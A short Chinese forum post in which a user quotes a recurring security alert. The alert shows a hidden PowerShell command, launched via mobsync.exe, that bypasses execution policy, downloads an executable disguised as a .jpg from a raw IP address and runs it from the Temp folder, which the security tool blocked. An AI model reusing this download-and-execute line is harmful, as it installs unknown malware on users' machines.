|
本帖最后由 15555676152 于 2020-4-19 22:35 编辑
每天都会提示,日志是一样的:
===================================================================
操作进程:C:\Windows\System32\mobsync.exe
命令行:C:\Windows\System32\mobsync.exe -Embedding
父进程:C:\Windows\system32\svchost.exe
防护项目:隐藏执行PowerShell
执行文件:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
执行命令行:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -nop -w hidden -c (new-object System.Net.WebClient).DownloadFile('http://123.56.123.76/pdd/InVan.jpg','C:\Users\LJL\AppData\Local\Temp\InVan.exe');start-process 'C:\Users\LJL\AppData\Local\Temp\InVan.exe';
操作结果:已阻止
==================================================================
|
|